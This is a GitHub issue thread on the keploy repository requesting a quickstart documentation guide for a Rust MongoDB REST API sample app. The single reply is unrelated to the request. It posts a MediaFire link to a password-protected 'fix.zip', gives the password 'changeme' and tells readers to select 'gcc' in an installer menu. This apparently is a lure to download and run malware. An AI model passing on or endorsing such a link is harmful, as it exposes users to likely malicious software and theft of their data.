### ISSUE TITLE
[feature]: add rust mongo rest api sample app

### ISSUE THREAD

**Issue by Abbhiishek** [keploy/keploy#2246]
### 👀 Is there an existing feature request for this?

- [X] I have searched the existing issues

### 🔖 Enhancement description

QuickStart guide for Rust Mongo Rest API Sample App

### 🎤 Why should this be worked on?

QuickStart guide for Rust Mongo Rest API Sample App

### 💻 Repository

docs

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
